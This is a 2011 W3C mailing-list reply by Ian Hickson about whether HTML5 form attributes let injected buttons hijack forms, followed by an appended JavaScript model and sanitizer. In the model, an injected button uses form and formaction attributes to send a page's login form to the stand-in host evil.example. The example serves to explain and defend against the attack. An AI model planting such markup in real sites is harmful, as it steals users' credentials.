
Re: [html5] Input attributes allow form tampering

From: Ian Hickson <ian@hixie.ch>
Date: Thu, 4 Aug 2011 16:18:29 +0000 (UTC)
To: Philippe De Ryck <philippe.deryck@cs.kuleuven.be>
cc: public-html-comments@w3.org, Giles Hogben <Giles.Hogben@enisa.europa.eu>, Lieven Desmet <Lieven.Desmet@cs.kuleuven.be>
Message-ID: <Pine.LNX.4.64.1108041608500.14637@ps20323.dreamhostps.com>
On Thu, 4 Aug 2011, Philippe De Ryck wrote:
> > 
> > I always hesitate to minimise the risk in security risk assessments, 
> > but this does seem somewhat convoluted. Are you aware of any page that 
> > has such a form, accepts user input, and uses a blacklist rather than 
> > whitelist, and allows <button> or <input> to be inserted unescaped but 
> > not <script>?
> 
> Your requirements for a successful attack are rather strict, since the 
> absence of a script injection attack does not seem necessary. A site 
> vulnerable to injection attacks can still be protected against XSS by 
> additional countermeasures (e.g. NoScript), yet remain vulnerable to 
> this issue.

NoScript is a client-side counter-measure used by a minority of users. If 
a site is relying on NoScript to not be vulnerable, then that site has 
lost already.

Thus I do not think that the described conditions are unduly strict.


> If you leave these requirements out, you only need a page with a form 
> and displayed user content, which is vulnerable to an HTML/script 
> injection attack. Concrete example sites are any site with 
> user-generated content (blogs, newspapers with comments, wikis) and a 
> login form (which is often autocompleted by the browser). Tempting the 
> user to click an injected button with "Some really tempting name or 
> image" should be fairly easy.

Once you have a page where this is possible, sure. I'm just not convinced 
that there are pages that allow form controls but aren't already 
vulnerable to some other equal or worse problem.

-- 
Ian Hickson               U+1047E                )\._.,--....,'``.    fL
http://ln.hixie.ch/       U+263A                /,   _.. \   _\  ;`._ ,.
Things that are impossible just take longer.   `._.-(,_..'--(,_..'`-.;.'
Received on Thursday, 4 August 2011 16:19:00 GMT
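The scenario discussed above, as an added example that is not part of the thread and not code from either correspondent: a comment containing an injected `<button>` uses the HTML5 `form` attribute to adopt the page's login form and `formaction`/`formmethod` to redirect its submission. The block models the spec's form-owner and submission rules over a tiny constructed element tree (no real DOM), shows the site's own submit button resolving normally, the injected button resolving to the attacker's URL, and the attribute policy a user-content sanitizer must enforce to stop it. The element shape, the page layout and the URLs `news.example` and `evil.example` are constructed for this example.

```javascript
// Added example, not from the thread. It models the HTML form-owner and
// submission rules that make an injected <button> hijack an existing form,
// and the attribute policy a user-content sanitizer needs to stop it.
// The element shape, page and URLs below are constructed for this example.

const DOC_URL = "https://news.example/article/42";

// Attributes that let a control pick its form (form=) or override how that
// form submits (formaction, formmethod, ...). None belong in user content.
const FORM_OVERRIDE_ATTRS = new Set([
  "form", "formaction", "formmethod", "formenctype", "formtarget", "formnovalidate",
]);

// Minimal element: { tag, attrs, children, parent }; parents are linked here.
function el(tag, attrs = {}, children = []) {
  const node = { tag, attrs, children, parent: null };
  for (const c of children) c.parent = node;
  return node;
}

function* walk(node) {
  yield node;
  for (const c of node.children) yield* walk(c);
}

function byId(root, id) {
  for (const n of walk(root)) if (n.attrs.id === id) return n;
  return null;
}

// Form owner as the spec defines it: an explicit form="id" wins and may point
// at a <form> anywhere in the document; otherwise the nearest <form> ancestor.
function formOwner(root, submitter) {
  if ("form" in submitter.attrs) {
    const target = byId(root, submitter.attrs.form);
    return target && target.tag === "form" ? target : null;
  }
  for (let p = submitter.parent; p; p = p.parent) if (p.tag === "form") return p;
  return null;
}

// Where and how a click on `submitter` submits its owner form. The
// submitter's formaction/formmethod take precedence over the form's own.
function resolveSubmission(root, submitter) {
  const form = formOwner(root, submitter);
  if (!form) return null; // no owner: the click submits nothing
  const action = submitter.attrs.formaction ?? form.attrs.action ?? DOC_URL;
  const method = (submitter.attrs.formmethod ?? form.attrs.method ?? "get").toLowerCase();
  return { action: new URL(action, DOC_URL).href, method };
}

// Sanitizer policy: rebuild the subtree without any form-override attribute.
// `removed` collects what was dropped so the caller can log or reject.
function stripFormOverrides(node, removed = []) {
  const attrs = {};
  for (const [k, v] of Object.entries(node.attrs)) {
    if (FORM_OVERRIDE_ATTRS.has(k.toLowerCase())) removed.push(`${node.tag}[${k}]`);
    else attrs[k] = v;
  }
  return el(node.tag, attrs, node.children.map((c) => stripFormOverrides(c, removed)));
}

// The site's own login form (often autofilled by the browser) plus a comment
// section holding user-supplied markup.
function buildPage(commentNode) {
  return el("body", {}, [
    el("form", { id: "login", action: "/login", method: "post" }, [
      el("input", { type: "text", name: "user" }),
      el("input", { type: "password", name: "pass" }),
      el("button", { type: "submit" }),
    ]),
    el("section", { id: "comments" }, [commentNode]),
  ]);
}

// The injected control: a blacklist removed <script> but let <button> through.
function injectedButton() {
  return el("button", {
    form: "login",
    formaction: "https://evil.example/collect",
    formmethod: "get",
  });
}

function legitimateSubmission() {
  const page = buildPage(el("div", { class: "comment" }));
  return resolveSubmission(page, page.children[0].children[2]);
}

function attackSubmission() {
  const btn = injectedButton();
  const page = buildPage(el("div", { class: "comment" }, [btn]));
  return resolveSubmission(page, btn);
}

function defendedSubmission() {
  const removed = [];
  const comment = stripFormOverrides(el("div", { class: "comment" }, [injectedButton()]), removed);
  const page = buildPage(comment);
  return { submission: resolveSubmission(page, comment.children[0]), removed };
}

console.log("site button :", legitimateSubmission());
console.log("injected    :", attackSubmission());
console.log("sanitized   :", defendedSubmission());
```

Two points worth taking from the model: the injected button needs no script and no ancestor `<form>`, because `form="login"` reaches across the document by ID, and the form's own `action` and `method` are not consulted once the submitter carries `formaction` and `formmethod`. A sanitizer for user content therefore has to treat `form` and the `form*` override attributes the same way it treats `onclick`; in a real deployment this is a rule in an allowlist sanitizer, not the standalone check shown here.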
